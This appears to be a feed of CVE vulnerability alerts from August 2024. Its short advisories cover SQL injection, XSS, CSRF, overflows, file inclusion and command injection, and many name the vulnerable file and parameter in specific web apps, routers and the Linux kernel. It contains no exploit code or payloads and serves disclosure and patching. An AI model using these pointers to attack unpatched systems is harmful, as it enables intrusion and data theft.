🚨 CVE-2024-7937A vulnerability classified as critical was found in itsourcecode Project Expense Monitoring System 1.0. This vulnerability affects unknown code of the file printtransfer.php. The manipulation of the argument transfer_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-20 01:07:28 |
🚨 CVE-2024-23897Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.🎖@cveNotify |
|
| 2024-08-20 00:37:40 |
🚨 CVE-2024-7305A maliciously crafted DWF file, when parsed in AdDwfPdk.dll through Autodesk AutoCAD, can force an Out-of-Bounds Write. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-08-19 23:37:25 |
🚨 CVE-2024-7934A vulnerability was found in itsourcecode Project Expense Monitoring System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file execute.php. The manipulation of the argument code leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-19 23:37:24 |
🚨 CVE-2024-7933A vulnerability was found in itsourcecode Project Expense Monitoring System 1.0. It has been classified as critical. Affected is an unknown function of the file login1.php of the component Backend Login. The manipulation of the argument user leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-19 22:37:32 |
🚨 CVE-2024-7931A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0 and classified as critical. This issue affects some unknown processing of the file /tracking/admin/view_csprofile.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-19 22:37:25 |
🚨 CVE-2024-4785BT: Missing Check in LL_CONNECTION_UPDATE_IND Packet Leads to Division by Zero🎖@cveNotify |
|
| 2024-08-19 22:37:24 |
🚨 CVE-2024-7512Concrete CMS versions 9.0.0 through 9.3.2 are affected by a stored XSS vulnerability in Board instances. A rogue administrator could inject malicious code. The Concrete CMS security team gave this vulnerability a CVSS 4.0 Score of 1.8 with vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Versions below 9 are not affected. Thanks, m3dium for reporting.🎖@cveNotify |
|
| 2024-08-19 21:37:38 |
🚨 CVE-2024-43807In JetBrains TeamCity before 2024.07.1 multiple stored XSS was possible on Clouds page🎖@cveNotify |
|
| 2024-08-19 21:37:31 |
🚨 CVE-2024-42986Tenda FH1206 v02.03.01.35 was discovered to contain a stack overflow via the PPPOEPassword parameter in the fromAdvSetWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-08-19 21:37:30 |
🚨 CVE-2024-5933A Cross-site Scripting (XSS) vulnerability exists in the chat functionality of parisneo/lollms-webui in the latest version. This vulnerability allows an attacker to inject malicious scripts via chat messages, which are then executed in the context of the user's browser.🎖@cveNotify |
|
| 2024-08-19 21:37:26 |
🚨 CVE-2024-31503Incorrect access control in Dolibarr ERP CRM versions 19.0.0 and before, allows authenticated attackers to steal victim users' session cookies and CSRF protection tokens via user interaction with a crafted web page, leading to account takeover.🎖@cveNotify |
|
| 2024-08-19 21:37:25 |
🚨 CVE-2024-24386An issue in VitalPBX v.3.2.4-5 allows an attacker to execute arbitrary code via a crafted payload to the /var/lib/vitalpbx/scripts folder.🎖@cveNotify |
|
| 2024-08-19 21:37:24 |
🚨 CVE-2024-24004jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutDetail() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.🎖@cveNotify |
|
| 2024-08-19 21:07:32 |
🚨 CVE-2024-39241Cross Site Scripting (XSS) vulnerability in skycaiji 2.8 allows attackers to run arbitrary code via /admin/tool/preview.🎖@cveNotify |
|
| 2024-08-19 21:07:26 |
🚨 CVE-2024-39470In the Linux kernel, the following vulnerability has been resolved:eventfs: Fix a possible null pointer dereference in eventfs_find_events()In function eventfs_find_events,there is a potential null pointerthat may be caused by calling update_events_attr which will performsome operations on the members of the ei struct when ei is NULL.Hence,When ei->is_freed is set,return NULL directly.🎖@cveNotify |
|
| 2024-08-19 21:07:25 |
🚨 CVE-2024-39464In the Linux kernel, the following vulnerability has been resolved:media: v4l: async: Fix notifier list entry initstruct v4l2_async_notifier has several list_head members, but onlywaiting_list and done_list are initialized. notifier_entry was kept'zeroed' leading to an uninitialized list_head.This results in a NULL-pointer dereference if csi2_async_register() fails,e.g. node for remote endpoint is disabled, and returns -ENOTCONN.The following calls to v4l2_async_nf_unregister() results in a NULLpointer dereference.Add the missing list head initializer.🎖@cveNotify |
|
| 2024-08-19 21:07:24 |
🚨 CVE-2024-39463In the Linux kernel, the following vulnerability has been resolved:9p: add missing locking around taking dentry fid listFix a use-after-free on dentry's d_fsdata fid list when a threadlooks up a fid through dentry while another thread unlinks it:UAF thread:refcount_t: addition on 0; use-after-free. p9_fid_get linux/./include/net/9p/client.h:262 v9fs_fid_find+0x236/0x280 linux/fs/9p/fid.c:129 v9fs_fid_lookup_with_uid linux/fs/9p/fid.c:181 v9fs_fid_lookup+0xbf/0xc20 linux/fs/9p/fid.c:314 v9fs_vfs_getattr_dotl+0xf9/0x360 linux/fs/9p/vfs_inode_dotl.c:400 vfs_statx+0xdd/0x4d0 linux/fs/stat.c:248Freed by: p9_fid_destroy (inlined) p9_client_clunk+0xb0/0xe0 linux/net/9p/client.c:1456 p9_fid_put linux/./include/net/9p/client.h:278 v9fs_dentry_release+0xb5/0x140 linux/fs/9p/vfs_dentry.c:55 v9fs_remove+0x38f/0x620 linux/fs/9p/vfs_inode.c:518 vfs_unlink+0x29a/0x810 linux/fs/namei.c:4335The problem is that d_fsdata was not accessed under d_lock, becaused_release() normally is only called once the dentry is otherwise nolonger accessible but since we also call it explicitly in v9fs_removethat lock is required:move the hlist out of the dentry under lock then unref its fids oncethey are no longer accessible.🎖@cveNotify |
|
| 2024-08-19 19:37:32 |
🚨 CVE-2022-25037An issue in wanEditor v4.7.11 and fixed in v.4.7.12 and v.5 was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function.🎖@cveNotify |
|
| 2024-08-19 19:37:26 |
🚨 CVE-2024-36054Hw64.sys in Marvin Test HW.exe before 5.0.5.0 allows unprivileged user-mode processes to arbitrarily read kernel memory (and consequently gain all privileges) via IOCTL 0x9c4064b8 (via MmMapIoSpace) and IOCTL 0x9c406490 (via ZwMapViewOfSection).🎖@cveNotify |
|
| 2024-08-19 19:37:25 |
🚨 CVE-2024-28672DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/media_edit.php.🎖@cveNotify |
|
| 2024-08-19 19:37:24 |
🚨 CVE-2018-10631Medtronic N'Vision Clinician Programmer 8840 N'Vision Clinician Programmer, all versions, and 8870 N'Vision removable Application Card, all versions. The 8840 Clinician Programmer executes the application program from the 8870 Application Card. An attacker with physical access to an 8870 Application Card and sufficient technical capability can modify the contents of this card, including the binary executables. If modified to bypass protection mechanisms, this malicious code will be run when the card is inserted into an 8840 Clinician Programmer.🎖@cveNotify |
|
| 2024-08-19 18:37:32 |
🚨 CVE-2024-36978In the Linux kernel, the following vulnerability has been resolved:net: sched: sch_multiq: fix possible OOB write in multiq_tune()q->bands will be assigned to qopt->bands to execute subsequent code logicafter kmalloc. So the old q->bands should not be used in kmalloc.Otherwise, an out-of-bounds write will occur.🎖@cveNotify |
|
| 2024-08-19 18:37:31 |
🚨 CVE-2024-34905FlyFish v3.0.0 was discovered to contain a buffer overflow via the password parameter on the login page. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2024-08-19 18:37:30 |
🚨 CVE-2024-32611HDF5 Library through 1.14.3 may use an uninitialized value in H5A__attr_release_table in H5Aint.c.🎖@cveNotify |
|
| 2024-08-19 18:37:26 |
🚨 CVE-2023-48644An issue was discovered in the Archibus app 4.0.3 for iOS. There is an XSS vulnerability in the create work request feature of the maintenance module, via the description field. This allows an attacker to perform an action on behalf of the user, exfiltrate data, and so on.🎖@cveNotify |
|
| 2024-08-19 18:37:25 |
🚨 CVE-2019-20634An issue was discovered in Proofpoint Email Protection through 2019-09-08. By collecting scores from Proofpoint email headers, it is possible to build a copy-cat Machine Learning Classification model and extract insights from this model. The insights gathered allow an attacker to craft emails that receive preferable scores, with a goal of delivering malicious emails.🎖@cveNotify |
|
| 2024-08-19 18:07:26 |
🚨 CVE-2024-6968A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /print_patients_visits.php. The manipulation of the argument from/to leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-272122 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-19 18:07:25 |
🚨 CVE-2022-48732In the Linux kernel, the following vulnerability has been resolved:drm/nouveau: fix off by one in BIOS boundary checkingBounds checking when parsing init scripts embedded in the BIOS rejectaccess to the last byte. This causes driver initialization to fail onApple eMac's with GeForce 2 MX GPUs, leaving the system with no workingconsole.This is probably only seen on OpenFirmware machines like PowerPC Macsbecause the BIOS image provided by OF is only the used parts of the ROM,not a power-of-two blocks read from PCI directly so PCs always haveempty bytes at the end that are never accessed.🎖@cveNotify |
|
| 2024-08-19 18:07:24 |
🚨 CVE-2023-1035A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been classified as critical. Affected is an unknown function of the file update_user.php. The manipulation of the argument user_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221784.🎖@cveNotify |
|
| 2024-08-19 17:37:44 |
🚨 CVE-2024-36669idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/type_deal.php?mudi=add.🎖@cveNotify |
|
| 2024-08-19 17:37:43 |
🚨 CVE-2024-36547idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/vpsClass_deal.php?mudi=add🎖@cveNotify |
|
| 2024-08-19 17:37:42 |
🚨 CVE-2024-34957idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/sysImages_deal.php?mudi=infoSet.🎖@cveNotify |
|
| 2024-08-19 17:37:38 |
🚨 CVE-2022-32505An issue was discovered on certain Nuki Home Solutions devices. It is possible to send multiple BLE malformed packets to block some of the functionality and reboot the device. This affects Nuki Smart Lock 3.0 before 3.3.5 and Nuki Smart Lock 2.0 before 2.12.4.🎖@cveNotify |
|
| 2024-08-19 17:37:37 |
🚨 CVE-2024-30860netentsec NS-ASG 6.3 is vulnerable to SQL Injection via /admin/export_excel_user.php.🎖@cveNotify |
|
| 2024-08-19 17:37:36 |
🚨 CVE-2024-30871netentsec NS-ASG 6.3 is vulnerable to SQL Injection via /WebPages/applyhardware.php.🎖@cveNotify |
|
| 2024-08-19 17:37:32 |
🚨 CVE-2024-25448An issue in the imlib_free_image_and_decache function of imlib2 v1.9.1 allows attackers to cause a heap buffer overflow via parsing a crafted image.🎖@cveNotify |
|
| 2024-08-19 17:37:31 |
🚨 CVE-2024-25306Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'aname' parameter at "School/index.php".🎖@cveNotify |
|
| 2024-08-19 17:07:31 |
🚨 CVE-2024-7799A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /simple-online-bidding-system/bidding/admin/users.php. The manipulation leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-19 17:07:30 |
🚨 CVE-2024-7499A vulnerability was found in itsourcecode Airline Reservation System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file flights.php. The manipulation of the argument departure_airport_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273625 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-19 17:07:26 |
🚨 CVE-2024-7497A vulnerability was found in itsourcecode Airline Reservation System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273623.🎖@cveNotify |
|
| 2024-08-19 17:07:25 |
🚨 CVE-2022-48740In the Linux kernel, the following vulnerability has been resolved:selinux: fix double free of cond_list on error pathsOn error path from cond_read_list() and duplicate_policydb_cond_list()the cond_list_destroy() gets called a second time in caller functions,resulting in NULL pointer deref. Fix this by resetting thecond_list_len to 0 in cond_list_destroy(), making subsequent calls anoop.Also consistently reset the cond_list pointer to NULL after freeing.[PM: fix line lengths in the description]🎖@cveNotify |
|
| 2024-08-19 17:07:24 |
🚨 CVE-2022-48735In the Linux kernel, the following vulnerability has been resolved:ALSA: hda: Fix UAF of leds class devs at unbindingThe LED class devices that are created by HD-audio codec drivers areregistered via devm_led_classdev_register() and associated with theHD-audio codec device. Unfortunately, it turned out that the devresrelease doesn't work for this case; namely, since the codec resourcerelease happens before the devm call chain, it triggers a NULLdereference or a UAF for a stale set_brightness_delay callback.For fixing the bug, this patch changes the LED class device registerand unregister in a manual manner without devres, keeping theinstances in hda_gen_spec.🎖@cveNotify |
|
| 2024-08-19 16:07:31 |
🚨 CVE-2024-42843Projectworlds Online Examination System v1.0 is vulnerable to SQL Injection via the subject parameter in feed.php.🎖@cveNotify |
|
| 2024-08-19 16:07:30 |
🚨 CVE-2024-42681Insecure Permissions vulnerability in xxl-job v.2.4.1 allows a remote attacker to execute arbitrary code via the Sub-Task ID component.🎖@cveNotify |
|
| 2024-08-19 16:07:26 |
🚨 CVE-2024-7832** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814 and classified as critical. Affected by this issue is the function cgi_get_fullscreen_photos of the file /cgi-bin/photocenter_mgr.cgi. The manipulation of the argument user leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-19 16:07:25 |
🚨 CVE-2024-37317The Nextcloud Notes app is a distraction free notes taking app for Nextcloud. If an attacker managed to share a folder called `Notes/` with a newly created user before they logged in, the Notes app would use that folder store the personal notes. It is recommended that the Nextcloud Notes app is upgraded to 4.9.3.🎖@cveNotify |
|
| 2024-08-19 14:07:25 |
🚨 CVE-2024-38081.NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-19 13:37:25 |
🚨 CVE-2024-6732A vulnerability classified as critical was found in SourceCodester Student Study Center Desk Management System 1.0. This vulnerability affects unknown code of the file /sscdms/classes/Users.php?f=save. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-271450 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-19 13:37:24 |
🚨 CVE-2024-6731A vulnerability classified as critical has been found in SourceCodester Student Study Center Desk Management System 1.0. This affects an unknown part of the file /Master.php?f=save_student. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271449 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-19 13:07:45 |
🚨 CVE-2024-7867In Xpdf 4.05 (and earlier), very large coordinates in a page box can cause an integer overflow and divide-by-zero.🎖@cveNotify |
|
| 2024-08-19 13:07:44 |
🚨 CVE-2024-7838A vulnerability was found in itsourcecode Online Food Ordering System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /addcategory.php. The manipulation of the argument cname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-19 13:07:40 |
🚨 CVE-2024-42757Command injection vulnerability in Asus RT-N15U 3.0.0.4.376_3754 allows a remote attacker to execute arbitrary code via the netstat function page.🎖@cveNotify |
|
| 2024-08-19 13:07:39 |
🚨 CVE-2024-42475In the OAuth library for nim prior to version 0.11, the `state` values generated by the `generateState` function do not have sufficient entropy. These can be successfully guessed by an attacker allowing them to perform a CSRF vs a user, associating the user's session with the attacker's protected resources. While `state` isn't exactly a cryptographic value, it should be generated in a cryptographically secure way. `generateState` should be using a CSPRNG. Version 0.11 modifies the `generateState` function to generate `state` values of at least 128 bits of entropy while using a CSPRNG.🎖@cveNotify |
|
| 2024-08-19 13:07:38 |
🚨 CVE-2024-42472Flatpak is a Linux application sandboxing and distribution framework. Prior to versions 1.14.0 and 1.15.10, a malicious or compromised Flatpak app using persistent directories could access and write files outside of what it would otherwise have access to, which is an attack on integrity and confidentiality.When `persistent=subdir` is used in the application permissions (represented as `--persist=subdir` in the command-line interface), that means that an application which otherwise doesn't have access to the real user home directory will see an empty home directory with a writeable subdirectory `subdir`. Behind the scenes, this directory is actually a bind mount and the data is stored in the per-application directory as `~/.var/app/$APPID/subdir`. This allows existing apps that are not aware of the per-application directory to still work as intended without general home directory access.However, the application does have write access to the application directory `~/.var/app/$APPID` where this directory is stored. If the source directory for the `persistent`/`--persist` option is replaced by a symlink, then the next time the application is started, the bind mount will follow the symlink and mount whatever it points to into the sandbox.Partial protection against this vulnerability can be provided by patching Flatpak using the patches in commits ceec2ffc and 98f79773. However, this leaves a race condition that could be exploited by two instances of a malicious app running in parallel. Closing the race condition requires updating or patching the version of bubblewrap that is used by Flatpak to add the new `--bind-fd` option using the patch and then patching Flatpak to use it. If Flatpak has been configured at build-time with `-Dsystem_bubblewrap=bwrap` (1.15.x) or `--with-system-bubblewrap=bwrap` (1.14.x or older), or a similar option, then the version of bubblewrap that needs to be patched is a system copy that is distributed separately, typically `/usr/bin/bwrap`. This configuration is the one that is typically used in Linux distributions. If Flatpak has been configured at build-time with `-Dsystem_bubblewrap=` (1.15.x) or with `--without-system-bubblewrap` (1.14.x or older), then it is the bundled version of bubblewrap that is included with Flatpak that must be patched. This is typically installed as `/usr/libexec/flatpak-bwrap`. This configuration is the default when building from source code.For the 1.14.x stable branch, these changes are included in Flatpak 1.14.10. The bundled version of bubblewrap included in this release has been updated to 0.6.3. For the 1.15.x development branch, these changes are included in Flatpak 1.15.10. The bundled version of bubblewrap in this release is a Meson "wrap" subproject, which has been updated to 0.10.0. The 1.12.x and 1.10.x branches will not be updated for this vulnerability. Long-term support OS distributions should backport the individual changes into their versions of Flatpak and bubblewrap, or update to newer versions if their stability policy allows it. As a workaround, avoid using applications using the `persistent` (`--persist`) permission.🎖@cveNotify |
|
| 2024-08-19 13:07:35 |
🚨 CVE-2024-27731Cross Site Scripting vulnerability in Friendica v.2023.12 allows a remote attacker to obtain sensitive information via the lack of file type filtering in the file attachment parameter.🎖@cveNotify |
|
| 2024-08-19 13:07:34 |
🚨 CVE-2024-27729Cross Site Scripting vulnerability in Friendica v.2023.12 allows a remote attacker to obtain sensitive information via the location parameter of the calendar event feature.🎖@cveNotify |
|
| 2024-08-19 13:07:33 |
🚨 CVE-2024-25633eLabFTW is an open source electronic lab notebook for research labs. In an eLabFTW system, one might disallow user creation except for by system administrators, administrators and trusted services. If administrators are allowed to create new users (which is the default), the vulnerability allows any user to create new users in teams where they are members. The new users are automatically validated and administrators are not notified. This can allow a user with permanent or temporary access to a user account or API key to maintain persistence in an eLabFTW system. Additionally, it allows the user to create separate account under a different name, and produce misleading revision histories. No additional privileges are granted to the new user. Users should upgrade to version 5.0.0 to receive a patch. As a workaround, disabling both options that allow *administrators* to create users will provide a mitigation.🎖@cveNotify |
|
| 2024-08-19 13:07:29 |
🚨 CVE-2024-32231Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.🎖@cveNotify |
|
| 2024-08-19 13:07:28 |
🚨 CVE-2024-22218XML External Entity (XXE) vulnerability in Terminalfour 8.0.0001 through 8.3.18 and XML JDBC versions up to 1.0.4 allows authenticated users to submit malicious XML via unspecified features which could lead to various actions such as accessing the underlying server, remote code execution (RCE), or performing Server-Side Request Forgery (SSRF) attacks.🎖@cveNotify |
|
| 2024-08-19 13:07:27 |
🚨 CVE-2024-22217A Server-Side Request Forgery (SSRF) vulnerability in Terminalfour before 8.3.19 allows authenticated users to use specific features to access internal services including sensitive information on the server that Terminalfour runs on.🎖@cveNotify |
|
| 2024-08-19 08:37:24 |
🚨 CVE-2024-25582Module savepoints could be abused to inject references to malicious code delivered through the same domain. Attackers could perform malicious API requests or extract information from the users account. Exploiting this vulnerability requires temporary access to an account or successful social engineering to make a user follow a prepared link to a malicious account. Please deploy the provided updates and patch releases. The savepoint module path has been restricted to modules that provide the feature, excluding any arbitrary or non-existing modules. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-08-19 07:37:24 |
🚨 CVE-2024-25582Module savepoints could be abused to inject references to malicious code delivered through the same domain. Attackers could perform malicious API requests or extract information from the users account. Exploiting this vulnerability requires temporary access to an account or successful social engineering to make a user follow a prepared link to a malicious account. Please deploy the provided updates and patch releases. The savepoint module path has been restricted to modules that provide the feature, excluding any arbitrary or non-existing modules. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-08-19 06:37:25 |
🚨 CVE-2024-6330The GEO my WP WordPress plugin before 4.5.0.2 does not prevent unauthenticated attackers from including arbitrary files in PHP's execution context, which leads to Remote Code Execution.🎖@cveNotify |
|
| 2024-08-19 06:37:24 |
🚨 CVE-2024-23111An improper neutralization of input during web page Generation ('Cross-site Scripting') vulnerability [CWE-79] in FortiOS version 7.4.3 and below, 7.2 all versions, 7.0 all versions and FortiProxy version 7.4.2 and below, 7.2 all versions, 7.0 all versions reboot page may allow a remote privileged attacker with super-admin access to execute JavaScript code via crafted HTTP GET requests.🎖@cveNotify |
|
| 2024-08-19 05:37:25 |
🚨 CVE-2024-26585In the Linux kernel, the following vulnerability has been resolved:tls: fix race between tx work scheduling and socket closeSimilarly to previous commit, the submitting thread (recvmsg/sendmsg)may exit as soon as the async crypto handler calls complete().Reorder scheduling the work before calling complete().This seems more logical in the first place, as it'sthe inverse order of what the submitting thread will do.🎖@cveNotify |
|
| 2024-08-19 04:37:25 |
🚨 CVE-2024-44083ida64.dll in Hex-Rays IDA Pro through 8.4 crashes when there is a section that has many jumps linked, and the final jump corresponds to the payload from where the actual entry point will be invoked. NOTE: in many use cases, this is an inconvenience but not a security issue.🎖@cveNotify |
|
| 2024-08-19 03:37:25 |
🚨 CVE-2024-44076In Microcks before 1.10.0, the POST /api/import and POST /api/export endpoints allow non-administrator access.🎖@cveNotify |
|
| 2024-08-19 03:37:24 |
🚨 CVE-2024-44073The Miniscript (aka rust-miniscript) library before 12.2.0 for Rust allows stack consumption because it does not properly track tree depth.🎖@cveNotify |
|
| 2024-08-19 02:37:25 |
🚨 CVE-2024-44070An issue was discovered in FRRouting (FRR) through 10.1. bgp_attr_encap in bgpd/bgp_attr.c does not check the actual remaining stream length before taking the TLV value.🎖@cveNotify |
|
| 2024-08-19 02:37:24 |
🚨 CVE-2024-44069Pi-hole before 6 allows unauthenticated admin/api.php?setTempUnit= calls to change the temperature units of the web dashboard. NOTE: the supplier reportedly does "not consider the bug a security issue" but the specific motivation for letting arbitrary persons change the value (Celsius, Fahrenheit, or Kelvin), seen by the device owner, is unclear.🎖@cveNotify |
|
| 2024-08-19 01:37:24 |
🚨 CVE-2024-44067The T-Head XuanTie C910 CPU in the TH1520 SoC and the T-Head XuanTie C920 CPU in the SOPHON SG2042 have instructions that allow unprivileged attackers to write to arbitrary physical memory locations, aka GhostWrite.🎖@cveNotify |
|
| 2024-08-19 00:37:31 |
🚨 CVE-2024-7919A vulnerability, which was classified as critical, has been found in Anhui Deshun Intelligent Technology Jieshun JieLink+ JSOTC2016 up to 20240805. This issue affects some unknown processing of the file /report/ParkChargeRecord/GetDataList. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-18 23:37:25 |
🚨 CVE-2024-7917A vulnerability, which was classified as critical, has been found in DouPHP 1.7 Release 20220822. Affected by this issue is some unknown functionality of the file /admin/system.php of the component Favicon Handler. The manipulation of the argument site_favicon leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-18 23:37:24 |
🚨 CVE-2024-7916A vulnerability classified as problematic was found in nafisulbari/itsourcecode Insurance Management System 1.0. Affected by this vulnerability is an unknown functionality of the file addNominee.php of the component Add Nominee Page. The manipulation of the argument Nominee-Client ID leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-18 22:37:32 |
🚨 CVE-2024-43241Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in azzaroco Ultimate Membership Pro allows Reflected XSS.This issue affects Ultimate Membership Pro: from n/a through 12.6.🎖@cveNotify |
|
| 2024-08-18 22:37:26 |
🚨 CVE-2024-43239Authorization Bypass Through User-Controlled Key vulnerability in Masteriyo Masteriyo - LMS.This issue affects Masteriyo - LMS: from n/a through 1.11.4.🎖@cveNotify |
|
| 2024-08-18 22:37:25 |
🚨 CVE-2024-35686Missing Authorization vulnerability in Automattic Sensei LMS, Automattic Sensei Pro (WC Paid Courses).This issue affects Sensei LMS: from n/a through 4.23.1; Sensei Pro (WC Paid Courses): from n/a through 4.23.1.1.23.1.🎖@cveNotify |
|
| 2024-08-18 22:37:24 |
🚨 CVE-2021-36821Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPMU DEV Forminator allows Stored XSS.This issue affects Forminator: from n/a through 1.14.11.🎖@cveNotify |
|
| 2024-08-18 21:37:25 |
🚨 CVE-2024-43304Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Cool Plugins Cryptocurrency Widgets – Price Ticker & Coins List allows Reflected XSS.This issue affects Cryptocurrency Widgets – Price Ticker & Coins List: from n/a through 2.8.0.🎖@cveNotify |
|
| 2024-08-18 21:37:24 |
🚨 CVE-2024-43303Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in videousermanuals.Com White Label CMS allows Reflected XSS.This issue affects White Label CMS: from n/a through 2.7.4.🎖@cveNotify |
|
| 2024-08-18 20:37:24 |
🚨 CVE-2024-7911A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been classified as critical. This affects an unknown part of the file /simple-online-bidding-system/bidding/index.php. The manipulation of the argument page leads to file inclusion. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-18 19:37:25 |
🚨 CVE-2024-7910A vulnerability was found in CodeAstro Online Railway Reservation System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/emp-profile-avatar.php of the component Profile Photo Update Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-18 19:37:24 |
🚨 CVE-2024-6221A vulnerability in corydolphin/flask-cors version 4.0.1 allows the `Access-Control-Allow-Private-Network` CORS header to be set to true by default, without any configuration option. This behavior can expose private network resources to unauthorized external access, leading to significant security risks such as data breaches, unauthorized access to sensitive information, and potential network intrusions.🎖@cveNotify |
|
| 2024-08-18 18:37:24 |
🚨 CVE-2024-7909A vulnerability has been found in TOTOLINK EX1200L 9.3.5u.6146_B20201023 and classified as critical. Affected by this vulnerability is the function setLanguageCfg of the file /www/cgi-bin/cstecgi.cgi. The manipulation of the argument langType leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-18 17:37:24 |
🚨 CVE-2024-7908A vulnerability, which was classified as critical, was found in TOTOLINK EX1200L 9.3.5u.6146_B20201023. Affected is the function setDefResponse of the file /www/cgi-bin/cstecgi.cgi. The manipulation of the argument IpAddress leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-18 16:37:24 |
🚨 CVE-2024-7907A vulnerability, which was classified as critical, has been found in TOTOLINK X6000R 9.4.0cu.852_20230719. This issue affects the function setSyslogCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument rtLogServer leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-18 15:37:31 |
🚨 CVE-2024-43318Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in E2Pdf.Com allows Stored XSS.This issue affects e2pdf: from n/a through 1.25.05.🎖@cveNotify |
|
| 2024-08-18 15:37:30 |
🚨 CVE-2024-43313Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in FormFacade allows Reflected XSS.This issue affects FormFacade: from n/a through 1.3.2.🎖@cveNotify |
|
| 2024-08-18 15:37:26 |
